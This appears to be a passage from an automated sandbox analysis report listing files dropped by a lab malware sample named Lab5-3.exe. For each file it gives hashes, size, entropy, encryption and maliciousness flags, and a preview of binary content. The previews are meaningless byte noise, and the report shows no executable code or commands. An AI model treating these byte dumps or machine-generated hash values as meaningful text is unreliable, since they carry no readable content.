                                                                                                          SHA1:0B23F3EA81DC89FBA7D2C1E9C6E0D5838438C5F8
                                                                                                          SHA-256:B068E593D5A3DB3B39CDD3FA5E175B53AB675A347BFDB9DA5182FA945BE21402
                                                                                                          SHA-512:74AB452342E570C3E70E36A1F7CEEF98D4E18BA6C8FCF692DC521D1309F625B2E052A320934D797D93F1C359DC2415D35EAD4A71DBCF774AAFDFA6B1B409224D
                                                                                                          Malicious:false
                                                                                                          Preview:K.....c..Gp..N.....=..nD...0..[..3.mB...Z.7x'I.....-.3...~86./..j....Yc..;<K..C,..3..6...ldV..2..\Ha..]/{.4Y.6..s..(...A8;... .y..F.oF.c...S.%....c...r ......"S...OHmh.,..8.K...X...0..e....?.g"...8.GP+p..q.....|...>.h..$#...|.u......t. 3..=...O..+.;..2......'G$.=..e.........qMl5L.&eU#B....c.X.={.S...3.#....;.BE.|.-.w.G8n&v8%b.c|.+5)z...GAa......JU.....<./..%.U..P-....7+..,."..N.(".j;*#.^..j.MK.$...[t~.......o....2..$Y...).e.l\&...~.F;..\F.....qt.x3.n....r>|.u..........*......OafZ=.\..).0.3...._.v.2.Q..{O.Ej.....p.Z....<......../Fq..\.v....'Il...&.g....{.`+...ar..1M*...&.]..l..<f..".:w.o............Gc.Y.!-......u)..."........n..b*.~.Q)...;.A....6Y.E.A{u{*....e..R...5.3...}(..p..DO..l......E/..Rw8_k.UJ.X;......d.....A$j.....k..F.....$9+...=V.....rP.s..>(...{.{..o.=..Z.'.H.P..R_.Y..M.._.t...#&.y.U.A.~9]~..2...h..~........cO..F./^.']#<<.k...r.....{..|.o..a..w;....)lW.#...UY.?F$....u..I.P...,..-e1....~B.q...@........%..A|......T..F.c=8.~.d...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23312
                                                                                                          Entropy (8bit):7.9910676079834175
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:BkUKXfme1aM6pH4Apqv5j9lsGHICuvoCGsCBDXGMzPpEVOwa7EItb:BwDaMIFe5o4IjvWWMbpoOsIZ
                                                                                                          MD5:E4B084E70BC8929DD6AE94374AD09324
                                                                                                          SHA1:8A50AE16596E7B87256D5B02B351774B0B452D56
                                                                                                          SHA-256:F2ADD75D587C45A79ABCE83E748B6D85E36E8C6DDB52E3C31752A26529F5BED1
                                                                                                          SHA-512:2ED8DC3CF57D04424BE058B86FEF36F9BEDD7E1EF06649D44922ADA2B85A0606B8F40759568E91CD690F15C707985032FA499378782FD28762787A7552F3D6B1
                                                                                                          Malicious:true
                                                                                                          Preview:xc7<.....;b..S.Zw!....$.0......&..bW......"...<..;^H./...........r....S..KsC.h.>......T...L]4!D.!..u..:.x..&}.....o.-...)....".^.....zY&....y9....`.p..,.~....>.@...=.DsGX.."z.T.*:.A.. .2.9bkjlX.....f..J........h.S(G..../..'....p.(.:.....6.p....m.1.x7.h.'7-..3..........@o./.. k.......a...%....h..'9.0....d..-.p(.....Y...-..;.....X..B...*6".u.../J..V"d.R.j..G.l...wURI.G....J.....J...B.......%...6..FX..X.+...J.......q.Zl......uKTG.gZ.v...m.9|..n...1)..%d.QUi........Z.*.......Z;..Z~dog..g2...$.z6.t:.N.{N#G.C.xu.N.........<s..\.l...07.:.`.#.!Y*..Z...&l.N...]d.9.....5a...I...z....q8.a.i.Jc.-9........U...+.#..&yfi....^:...p.....T6..~..TA....`. ....2...z.../.|.I,.....Q......`..w.~.+.^k.jr_...>SH.G........>.7.{.G.@`&)r.....wE.z...5Le.n.z.*[^.1............[......e....../g.B..?..X.4F...v[.3.3.....a.1..[.j2s.4|.........<..IS*.s\.0..............g.[.g^4.ZzE<.OW...$..hy.... ^PZ.0.j.:6.\E$....a2.p.....+...j...v1.,6^....b{..u.E.WD.Atc.h.h..d.._..|Dnk...c.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26128
                                                                                                          Entropy (8bit):7.9918684206211426
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:vW3qgI0r2b6YFWOw+YZYSAv0guEYMj8BBRmrvBBCKYFf6CQrYZH3xrSJ/5L1Fk12:udubtFWOQbAZ6RmrZsFAYxARZk1FpKZ
                                                                                                          MD5:685B626BCA18175CAC6BBAA6E16E07D3
                                                                                                          SHA1:FBC42EF148360CA13F30A334D8DF7B791F1D5C8C
                                                                                                          SHA-256:1E72D82D86A358FCD6DFCFF5F80320F8240F2FCD4382A9B69CC5289BD83043BC
                                                                                                          SHA-512:4A0B8E4370B9DECF5F84053AE1F5BFB42B93CEEFFC4296AF2DA34634E2D931C7C3B3F7CF269D2149E68B06BD0F3D24CC70E8FB9D6D1BDCD61E637E9123BDEC7D
                                                                                                          Malicious:true
                                                                                                          Preview:y7.X.;<.`.Q.*.o.........!..B..0.w.$...p...i.X.)oO.`.*.. x..d.i.K....2.5.E....'.C....!..-i@.*...t"..Th^..}..".J..>{R.:...q!n......h\....^....Y..P.VC..7.{m.D....%..H....h...]..u..N..\._8=.+..............P@.R....^$.K.z..y.r..G?.LF[.G.x....f...V.....F.C.ZW.{hXv..T./...H..l_H....P.0...7....e.Jt..%.&<).....|........p..+1..BXT...]o1...D.........-n..!.df...>=5...K....b...|..p.t.._.H.N{....`.M..WWa9.].... },....vM.....1.dRp...)..O...v.'GR.#.G..h.....C.Wh...L...<.3.|.J1`.~.&T..).F....`..[.uG.D0o.B.if|.[...+....).9..i...s.X...(.u...zI..R#.?o........|.......`....!....;U2.[.~..s.s..${......8*]..E........H.7b..}..{..5-../.j.b.J._....7|.Y&...W#..Yl....N....7...e.m...+.....if....}..[i4..9e .4u........5...O..u/].........yuS.I.V...SUd..e....H....F...'C...A%."..F.>p..J.'...4.....}.f..c.X...w.T..!.....s.w...N.x.5s>r.......h.....d..]dy.....d.nop.M.>.E.u$..`.=.....]..uo......xi.&(I..web...9..x.r.7.'....t...y.....<.6,.9.^.8...J.N#...L.a`X..L..uG........U........=.. .
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):67760
                                                                                                          Entropy (8bit):7.997082518809264
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:rX0iHNejkkCKkqFIGC/olwfQFbH9ixdXI+EZ:rXBeKK7XC/oafQFbdixd4TZ
                                                                                                          MD5:B6C1A2CDDF2CA216FE30B537C137002C
                                                                                                          SHA1:477936B068BCF02C681364BF04FC68DD2D105206
                                                                                                          SHA-256:3EF1A0C35460179AA4C3AE4F2671A8EEE62C02ECA1F6C8AE6E420988989C08E3
                                                                                                          SHA-512:34379DF552A87B5541E5CFC35DAB60F0C9686FE08EF2438B60F9B58D123758E8F9695D0F5F85A7A97D5B0C6AAB882B5A60A46640F5B51C0C56EE3318C941E289
                                                                                                          Malicious:true
                                                                                                          Preview:&..(...._......A..8b\..gX.!$.Y4..~O..-3\{.....Y.H...K........3.rE`.)..5...$....s.<1L...[.%N..F.r.;...2n"...?......S.1p..r|2..b......I..X.+.......... .)..MV....'\b..3..Y.ZYLi..j..j...."M.T..(..!...........F:M5....!.v`.~Z..?]...J....N.l..;G...&=..r........?.aP.!...:..b.M....e..F..{d...'\.................s.../ZZ5Ex.I)."..I...Pe...tQ#..v.[.^Ye"&...T..m4+..y...q..,(....W.z.p.s.....z.9.....8\..%...#'..TwC...O..%j.eC.v`....^...qQ.A]..y.d.....(nR.......hA.K...'..3.....(.!b...R...x.:;gx.../.0.F.B(.<..3I.%...W....Qu%..}.....\d.B...t./.U....8...o.....!.K.L6..........0....d#.t.N.......T....$};.r.r.....R.i...&........Bui..P...}#...k....}..^.;&....Z..#...iy....I^~b..Dg~..5...G...T..w%.);...<w..T:5z&V..[.u........W.!...".n.2=g...@)..... z6g9...$K...._...v4..........*..C....i..$z....`.P.........vE....h.........'.3.....4..E.)......ip)Y,.. .r..h........!..5.HM?.....B....xN....2...............a.1....q3..)X7..k..h..i._..0...Dt..K..w.....S.`iT...U.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2272
                                                                                                          Entropy (8bit):7.9290744685699845
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Mu/XvJT0NKvQG4VZ04WGj0QUeEK4nT7h7GHfUTid3hBaUoSGFcmeykEdEElU92i:ZXVyKvQGyZ5WRVeuT7hVGx0uKeY2ElUJ
                                                                                                          MD5:85CD211DE4D09B334081515481705A68
                                                                                                          SHA1:85B144022BC12392BB324C55A74BEDD1AD869244
                                                                                                          SHA-256:126E3FC4D89D7745FE53F33090A1A97F0BE9B251A43FBF0BD610D6B909E3BE94
                                                                                                          SHA-512:6D5AFFB44697C1DEBE40684FFE94F04FEED058A3F0BE477583F821BB9143094A266946058F132DD961D91AC3879D6FE60BC7441377A3B28DAED242CFAAA2D01A
                                                                                                          Malicious:false
                                                                                                          Preview:.Z.Vu...H.....z..?"..DX....Z...:...Z-7.DV..B....l..').... ....N.G}u...}.fn...{.k..U.D&4...R...d.P.74.......:FBbcZ.&"s.F......|.."r........44)*"..q.".=...B3.Z.2.fi..#..B..E^\.+.\.......9..v.3Yu..T}./!...X...5.1z...B.u.5y..e|.t.@.:.&..V....d.u."sbht,.aE..e...y.V.."zQ......_........ZN.J...c...%J.~..;W..!.j.f0.p...7....$..~.?3.......-...x.c..$.. ..D....J...LZfk.d.'..|d~..DP<....V....D....`..m.b.3....L...t.B...$..M...O.%@V..gRn.0Eg...K..<s.....,.a.\D.K.{.6..}.O.3h..81*....E....CW..de..._.<.C.s.O].$+.VkW.^..D#x.:8k..t.~...]..z.#2...V...h.}&;....<e...o...c......!.{.M..G.......2.g.**..F...]ar..$.8.........G.dY.w..SXuEoI._^.Q.i.*....vU.'.A.. .C........r.f..--2.t....g....sZ....B..4&.....,..Y..p. ..H_..].:....n.K8...p_.c..uO.;.K.v.^.w.P...n).%.N.F..8.L..kZ{uX...Wn..H..QFM..+.e=.....F...`X.b...T.[.....`..}M.tF....i.W$@...%..V...O..C.e....@*..V.T.G.h.).u..0Ps.2......=..^.h2<.?v.M...\L.n..}Fv......A.y'1..v.._%....5..c.....O....).{G..^.Q...rp....;....M
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):663267
                                                                                                          Entropy (8bit):7.194357591938632
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:cIj4ap512ygk6eDuWoX/OFjrunHX+qVKTp7:cwmyvzKPvyjCnuV7
                                                                                                          MD5:94560A947721C62CE4BF106670F7239C
                                                                                                          SHA1:415C401C8B91D1E431190F8295220341D0C56262
                                                                                                          SHA-256:135F36B709369AD36FC98C16D529603B87E912E1A31EA41F73A0133A1F682B6C
                                                                                                          SHA-512:A804711DFFFD2301D34E9DFA1ACBDAFDF92374EDA8D10FB179CDE5D11E33A8238C18A07B7C3C8980E3A3482171996C52CBE43FA9A21DF2F3626E558C8C9B8442
                                                                                                          Malicious:false
                                                                                                          Preview:..C.<&...z.(..o...'N....(...n......J.+7.M.E....g.Yl...........g...O.L.p.@.K...s;?K..0C@7.). ...O..^9z..Rs..h/...,R...)<.DuO&....Gq....l......l.`.....5C.5...t~.M.].%........".e...=#.=....>n......p..."V<>+....K|..9...z.........p...W.i.....Y..E...bmpJ..D..V./..Z...]....a|p..J...vq+..+3a.....-hw..>&.S...)=..Y.....!.k....Ac......v...).4..J...!.$v..:..........h.i.sd1E...*..I^.......U..vY..S.F..mh.'$(.Q*:y.m.N...|.c.....xk....y=+.......z9.1#.2..na{.....,s.. 6..^.0..dx...i~.....,O...OD..^..$.E.4......i`.j.#.XU........... ......^.p....h].=.Y...].`....#.c.F.x...9..ha....ET.s.hr..5....< .$.,.X<..B.y..F..P.v9.....9.1.I{.`........=.wA:.cT...mq.G.6).-....'Y=..1... .Ljq...}.Q.j|..N..6.T.....v...G....N.gx.^Ir.#.....3......j\..D.....r.!o..XOo.O3..[H.|[.... ....@[2gu.B.. .7...i5N..W.82...x=#.......B.]S.g..i..x.mD....v.VjI..v)PS4....?.C.......;......y..n..z....f....vQa./&.`u.3.....m..J..H.d*V.O.P....TSR....-......b..}....R {q~.jm....%.!.X%
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):194528
                                                                                                          Entropy (8bit):7.998968686486135
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:Ksjiq8Cuqs+tyL4ho5GopZ3SVwPlxUxuMDu3DmTpe2qKb6s8nrwTfkqFYAZ:KsjUH+tHo5Gk3UwPlxUYWED2pedK2sZ9
                                                                                                          MD5:BE0DC4E43EE93DE3AB0D07E3EC454A49
                                                                                                          SHA1:F9E97724910F921B74FEE92E538254B87167A586
                                                                                                          SHA-256:9C02D91D74CC2A3BBD9B5DC08679CEB22868642000A1C394C62F632F757C61C2
                                                                                                          SHA-512:96F8863E7DB835FAF914A081528D09D65993659670BDB910F7F9C200265E683D4770FE956899DD1803C2017F10F0D06C8F3527170DCC36C2F26DB3A2DED8D182
                                                                                                          Malicious:true
                                                                                                          Preview:u...^...,..'.P.c...G....c......X...jl.(#..V.n...hF..z...T.y&.mX..*RO.......+0D.0`.pR2...%..A..L.."A.y..X..|..8.c?.c.-...i.V/.@..{....|....,Vj..`.s%...5....<..D....~}...o.._[.n...81..v..?\.`..]...H..Y..9..AcJ..v.k...F|.".H..S..<M.6..K...q.C .m9W.[.^...!_W.O3.;:2\.K..mV.zxzf_.?.Xu.M..y.....FF..(.....pr4.}..r.w~k.;.U.TT.hN....q..].....9D.0.....J2..?.....2E%....J.t?.9.......G.v....v....r...\oK.B..k....Z..j.D9.}.N^?.... e....O>./.........>....|Ee.>.&...w.|c}.V....tQ.......g.1_...C.J..?5.uk.,.Q_c..*>...).-.m=..;..qA.."..h...R..B|..Q..vDT.n.....H.%..M..L..N..o...j+w*F.+...A.!.yV...be..)........iY..%..2..a.F.c./%.....nu...?.3&().'...x.....`i!<..L.9.=[6......V..-m..Et.tf.0.3.u..U..]...H...=.m....^.Z)....n$..G......:..}...Q.">M.lt.q.$...#.7...).0X..Y..R..k..e...P.+...6.....c.<.LPgI....!.F&..5...Ti.eV.5f,.`+...j$.C......3.3.r4o...;.2N......r@..x.Y...q..p}..d..b.......(y6[.(.IF..hp.\..e.i..+z.J..u.1M..[j....|..v.^.!.c.`.....nx...~..e.-*..(
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):241472
                                                                                                          Entropy (8bit):7.999163354664109
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:brB7tfq4ou8iBzTCWMAT8StdGUL6IZWi4vBqhBK69smkutgZ:fdXt82Oa8ydGtr15qwmLy
                                                                                                          MD5:9B184DFBBF604C0A44C8C2D0D526C7B9
                                                                                                          SHA1:07B8D7FD5A57B323466D4C04A469A17B5EB4669E
                                                                                                          SHA-256:623D47B573D2DBABB909AEB32F5463A15B136A6DBCCBDC1BACAAD6758DE89B3A
                                                                                                          SHA-512:94EA73C3071EEFD65F1299AE4FF40B9F5C5D0477FBBED5C1FB1347CE8A410865AF5F0B048FD5A555A1CE2414F88A573D9FE335BA8E66EEEE11F39D0DA9C742D9
                                                                                                          Malicious:true
                                                                                                          Preview:W.DZ......z..%!|..\.......[.C..R..Eg.T..../.6.n$.U.uV...Y2.C...lR[..`@.a..9dX....b.#~9..?....]".hL.?..!C.....%.S.mnWf~.$.a..{!..:.y3#'..~t'....)......r.$4.v.O......T o....?..0'%.._.....=B....1.49..P. .&d.d?.sP/.H.V.%.+$...zX.P....._.2%t..c.S[K..x.k...L......[..mT..+1.....\.B}..-=.[...}.........8'.....V..B.jSS.H.{...o.g...G.I@..m.....d...9..>.TM.6....A'.lL.R..VO.59.......$.n.n\.=.d.....4.0u...TU-.N..,......nMR...7..}u.H..d..............g>+.M.$%.%}{......d......X..;..*......X..m......,....KM...y(D..w0:.xzO.....l?.....Z...j..`.f.A.7o.p......Ay.~.8k......D.......P......-p}u.Y....Ny$.;.}hp..l...6.W...>.. ..>.k....".T.....o.u........sd.q....HQ=...W]C.O^d...t.T7}...G.@;.._.|..........hP.?(...o.#q.+.>.....m...9......L.$...s.+"t..w.......p.....Mt...+.C..nR.b. X..}F....u0..%.$.3.N.).>..vO"2.y,.rFeJ...K.['3.:..._V..c.....1...0..;i9.."[ec`t.6.R.'.....ZkmT.*WQ..l<.8...=...M....#......l=..../...h..{.....-F....4m".E.+...g....:^?N..](1.j...$Qg.7.&S..1wc.p?.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):151056
                                                                                                          Entropy (8bit):7.998791878491829
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:bjlAmll4rOz+AfPBjvXQYRRluZoWotE0neeuO09fvG8nUfWYH2sMqHTxbboZ:bJf43aP2YRR021yHe363G8nUOYHLHFbI
                                                                                                          MD5:669FFA2B606B3F1D117EF128077119EF
                                                                                                          SHA1:97E3786E6776F21F925CFFFBD2EB6A7E664F180B
                                                                                                          SHA-256:C3A012C714E24D910BB7DF31F4F5565DA9CF603CEF00CC182E87EA73986575CD
                                                                                                          SHA-512:A81CD51D13E5A9CA67599B418B6C7CA200474670F2CBF9374AAA6BCA05BE30150CF6715B2BF734253305975AA56D4EA587607F2D2A8C8198A59A2A3D68E03A8E
                                                                                                          Malicious:true
                                                                                                          Preview:.c...TU.i.]./dD..l..Y~x6....$.....%.......,...pW.X..G>`.SB..g...4.v..v;D..7M..)....Jdi..o...........:......'f.f[...j.\.9.._...`.O0...;..;...Y.."wh...u#I.oX.A...e.r....oP..Z._...4|d..^.b|...p.....w..gDQ..7.RCc.......i2LE...s9..6.Hs...j....s..8...W>@....Z..'...w.@[7..u?*.W.L..e.....>.X&:..U,X.P^.%.a..g....'.......}....~Ce7@X...+a%.[..ti....!....<.h......sQ......Z$......Se<.Q.....J....W..,..>;.3.i.... R.q..f....n.....4K.....T..d........(..k.h..N(b.......j.Il.*^<*R.V'...N.2.......pg......!$..^..^.`._..v..E"G..E.Z.9....X......n...}..Z......f.hQ....U.....`...-.\a`.....+R...E..}..;)i.i..C...j...Wi..zQpg..R*m.I.I.$W..iW.YN.......K.....jB.,P.......H^.>......%...Q...e...).+^k..y..NW.Q..B..}...f^...../...n.g=.$0....(Ou..'......L./.`c....\].....a.eS..(91......c.f^..Ia......m97...t.'..#.lP...B\..J.c%...VJ......^.[.#ab.....a.H.4....o ...!...}.(.o./.>F....q.W.......+PN.z(.%..h?q..gtk......<....b.I,..,..%`...e6.<.Dxg.C..R..".x...p"qE.m..M.09-W..^.:.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):75760
                                                                                                          Entropy (8bit):7.997762289535255
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:icpI3ZuH00UpZ3N4rwgvHlRg34Lmj5t3peGjT0E0rRTD1XiZ:PpI3ZfDZ3N4EOlRgIs5feG30Eu3wZ
                                                                                                          MD5:AEC074A28BB1BBE53AA53E73B80CA456
                                                                                                          SHA1:AC4587FF37157F601E1FB20F1EAF4C32DFF7F747
                                                                                                          SHA-256:5143A29E01AB37FC65BF5CC2E0A08AD6101120308F65240AAE94D51EC2257213
                                                                                                          SHA-512:556010027B4F4A0DFD8900C3E583AFFBF20D439D269A6D12941A591C91DECA27258D48232BDE0EAAF257775870309CEFD89F5A93DD0F0781069762A19739139F
                                                                                                          Malicious:true
                                                                                                          Preview:.$.&...>vw..Y...Cu.....`H......A.f.-.O%8.88.....^.1.t......bd..h,..xZ./K.w.(.anu#.}..\H..v/k...N{.c....23."...]......+.P%{.Q.....m.x.d.m,p...`...e.Nn*5..0.e3.}...{.-....#.;.....e....2..>.f.....V.q..+."/F..DQ.c...B....|..Y*..#.V...=3..?..,....j[....'2Y..hZ67..*..P...L....Wq...c.H2.n.e......!.C4.B.F..T.i*S={.40U..2I+<.Y....dx.H..H..F.&.tw.4yP..@..=.B.....<....q........:..p..f...G.7...I.1....o..`......_........j.M*..1......p...5T...x.]..1. #.......I.).y..N.:..g....Po..sY.j>.ovU.W...1C-...B..y....D..i...=......H.........n.a2..4j.......T|......$w..Z.....$P.e\:..C......P..l.UXd...3...W.... )g.e.i...Z/./.6.Un...a.~......d.....U.#...1..s?J..."z.v...a9.&....V...?..D,._.....l..fM.:@JH W..0V.pp.....w.f|....k.....U.T.M.L...tz.I,..H..f..K.J..I...8..R9...ps.%.H...Q..!.7....(.(l~m...X.....[.s.YO..cJ7K...HL....Xm..HP.lf.*.{.$;z.2i....A.b.<...8.F.;..?....-d.t....8..../.m....2.......*.....z...w|75K..6_.A.v..f....rN.....g_c.4:.JE....[.A..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66416
                                                                                                          Entropy (8bit):7.997127991900581
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:6TydSRlBlGxP0muxRUuOAAkKwVT/DYwqZmyVbIgYPgyYrgZ:kRRlUcmUUuVpTcFJxXYPgyNZ
                                                                                                          MD5:5644B0F6E4DB676A4CC4CE120BE608F8
                                                                                                          SHA1:8C7E66B4B6C0A2EC1A9D8D5E5C78645EC9629634
                                                                                                          SHA-256:412A7AF37534F0DBAB069AFA04FF9A1D886B2BBA152FCC8AF5AAD8AF08C10909
                                                                                                          SHA-512:F7647D729A93960D168A9796C148459965678E7A0AE0E9E0D54F6BDDB6E63B32A8BDDD6B4C0C6912D4E4F019DA3F0897D8E598300F398452AA4EFFCFCE035095
                                                                                                          Malicious:true
                                                                                                          Preview:HZ..hn..>...R.1.#.......|..."...5..K...1....".QDz~..Fv..9....~.....[....2<A...V...z..W.....S.7.p....!..=J..)5L4qe......w1w.L..ah.}p.'.Ox.w..L.....D..>b...+.'W...&.v...&`.....<..3F...Lc.^.H..."...-.."q...K.....x.k.bi`..i.?.B...=.-..3(.'..8..3jc....................o...'....'f.=.:.Mt..!..Gx..G.N.AE.Q.=...........<....HQ..@.....v.!S,.b0.<zO..b.oQ.....n.a.K.[..H.<p"R...<.. .f~1$.>...=o.......}@..,........[O .I..]..X.O..zMu.H]E6.b......O...r_.U...m..."TF..5...f..H...svq..p..T?.<.*...........%dQ3+..x.....(..[w.Un..?........D.AoN.....Ed..&k.z._V...R ..#x..C.^...XE.e..(&...o. ..[....+- ...Z..o2.k.oX.k.I.<..h.O7...+\.WO+..Q.?[.K.P....BS.`[.C.G....:....p>...P...Y.W..x.-n..$......-.v....."......8.NX..{G..v.L.....9.F5.,guCN..J+.......... .4...E8..S..o.oQ...:4.......L.!g...rJ..H....Of..g.F`VHk.+.M`[{#:X.8..@.:...-(...&....V1.'h.c...D..6......WQ..z.i.81".\$.e.d...../9..M..........;Q...A.y.M7....mK9.Y...f.....#.....f)...u...R..........x.Z..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):75760
                                                                                                          Entropy (8bit):7.997495413064794
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:T361TnrkNmEKC/eN9PCtDdguJ+UwJVFNNZZ:exYoC/iupgzj/Z
                                                                                                          MD5:B3750F751B87875E87AFDF4D1A443B49
                                                                                                          SHA1:3AABBEE7985FEE241300B832F6E599CB83F09B9A
                                                                                                          SHA-256:BCFF2CC78585760D79A958B03F2B6EE4FDCAD2D81D8BEC5BCD0BF7F3CE8879C6
                                                                                                          SHA-512:DA9E831422363F1CD464C78DA7DAE0C701646D18986E4B807C275A8A284778D903B8721C6ACAB2C24D3BA13409692A84F5392395F746571AB70549464489C240
                                                                                                          Malicious:true
                                                                                                          Preview:....K..093.;({........=L..f.)w.{.RI.L..ZQr~.k.w.+...Um.....~..oS........F1......]1.......,.i...m.AB8.s`.S.M/...k.&u2 .......i%.&.z.T.......G....^.Z.....|l......?.....(.p.e..Jc:.j6.%..4U......-x.......J.......9PS.L{@.........+........Q.f..*.q..+.oq..z...vu"....]b?.t..{..f~.U?x..,^dj.[P.H.>JP....*..2........k.K?.g.5Jm.9T.n.,.(.C.O.6.zy..^.4..I....N...k'_....z.c.[.8...m...q..&...Y...IEV./jH..k+&......*w.X...W.c...!.b{..4...rU..8..Rv.3J....FL.....S..p9....?.._....S...b).....Y..E.........6.3...a.F..-...HD[.G).......6.x.......*2c.ib.....`.=.3.OD..n.......y.....8S,..e..g...<...O.->..G.Q.....I!.&..B...z...&T6<.....M.....6.).qJ.uU.{...nFD1p.....qVB.+.H..Pc.b..k.`Ee?6i.[S..!7b..j.E.M.....q..q.`...^..MS.| ..{ H..4/...(x..`6!}5.....j......[...Z.......\:W....1m...D.X...Pz....5AA.> .m.^.&-&b..C%...k|Y..$..(.c..'..!.v..I..MJ.~.8....<......{...P....*...i.prc..)*.....O.O]+z.Y.L..[..v..j.Ci....HY=.......)je......x..|... ...o.4..b. .t_.......(+4ik.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1602416
                                                                                                          Entropy (8bit):7.987478668841207
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:egMw1sLx7+ZIvqhSeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzQ:/M2uxr24gQu3TPZ2psFkiSqwozQ
                                                                                                          MD5:C2412D7D2F10885DA924D40FDBE2AADC
                                                                                                          SHA1:0B741B6B8A7C2314CCC8A2764EC9B78389806858
                                                                                                          SHA-256:CC04EC4729607E9E88838ACB927519711D7FB06BE381070E08D1888400EB62CD
                                                                                                          SHA-512:875FACF97F57AE5E90D8A1F2A165EA692EE0CBE878141EC1872AA19CA02939C663A08BBB4A9C9437DE94BB10105557BB7F36DE1B3BB5FA8534FC326A03976E99
                                                                                                          Malicious:false
                                                                                                          Preview:..AR...p.. V.+.......d.P4........xQ...sr....h..Kovb$E.O...W.;G1P...../..=.....Z>.NA[}.......-'.....8)C.=...E.A...(7xT.....kq.~..~.. .7q-..i].......Ho.i..>.|...V.}/;_.......&.......iB..x/..xh.|...8.....y:.-......}..fV...Z..r......R.I.!..Z..l.t.Dj.u.?..o...[.....[X!+F.Xm.}y....?20.r.....A.!}.0..@.a.i.4&...-...+...T6L...2..N..r....K....ln.....E6.t.h..L.....*............O..y....e.g..y....f..}..EK.m.'..6QS.J....-+.Wbx...(..=..~....u.s.>8d)A..'..%w...g[..i..*&.S..z.o.$.M..i..y.....O@..Q..W...Wa...*.~.e...]..@.@...0...%.v.R|p.Y.E'.83.,.Y./.c.6.....6.3T..;..im_...../T9.X.;....1....N......(v)......9].lV *....XzB.U.E....'..x\.T........=...V...o6%.M.)..7..o.Rv.?d..n.=.7..u.......{...z..M$...]...m(.N<.>.1..\.Ij.6..W=$H.|..`.Z..C..E~.i. N...).3W..Z..7*_...^...%yb.R..Rj.GS....Z..N.--P*.%s.2..G.U."0..H...o.p.....zZ.h...&../...j.Vp.H4m..N%..(....6...2....{.....5....Z..3..../Y u..<cm.(*....i...w.Q.g...Y/P............0.K....&.,v..PSqx.\.I-Z........*."..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):66416
                                                                                                          Entropy (8bit):7.99719074532306
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:SRlpaxT8LjgDNVXaZBFSSz1jjZrDWXzwzTULxdZ:SRlpa98fKvUBFLzNjZrDaTxdZ
                                                                                                          MD5:6001C56EA8F874D3D18F3ED32A314C5F
                                                                                                          SHA1:AF9F0A97741E37A95D84AAD167A10A8531462345
                                                                                                          SHA-256:88CF90BB080F22F917EBA8D3786C6FCF6E6452BDCA238D10D46AB9BBD7D46131
                                                                                                          SHA-512:3FB987BDD73027AE4E403E5E817F9759EEA2957808474DD9181E5E8E557FEF049D083ED29A115C509706A46B6497875CB42BB5B2896CB27A261C6A7CC1268A1A
                                                                                                          Malicious:true
                                                                                                          Preview:.x....R<......V.S...u$.....N}.......~e....AzB......1-6.0|J.xx.......o..M._.[..\.{f..JOge..|.!.>..w..c.n.A..e.S...2.n{.&c...6F...i.O..s...f.NL-"8.o....3.......S.&.Yb...Uk..\..$).X.....A...>e.(.r...s.W.c...?T....;.^.w..|.......zRUB....6<...s.....].Q.Q.!.K.(;..Z..../.]....=^...&...,.Q..Kb..%j.!A...I-...Z.j..@.k{..'u...._..%......a...)&4..%h.t..~\.zCe.W......S.e....o...x... Gr(wLhv.T.$s&.v2...5.9.0.).....,..@.2,.V.....lm.Pb$l.....Dheh.|.0....E]...(.....-....[.K..,........t...T.UPv..n2.B.a.1..7..L..I.....s.........M.I..a`.7....X8.U.0.....%....F.=....B.YR.......\.^....7t...p.'..W...[S=*V6@....f':..kN....>..D,H.........7..N'....j..h]..zp..Va..u9..XGd...vo..(.]...-jx..... W^Rb..5=dF.....)Z.........,....<.@..b....fi+.OX..V75F......(a..h.T)?...q.....Y.^.m....B...1.F.&w.EM.S.IK.!.d.i... .C)5...o...r#.&t?.^.0...~."G\.g..j>........VZ0.C%}..A0f..y.....+.......)......%......3...I..|.....7>..\....l`.$+...4...T.f....RC.|..p....................X..
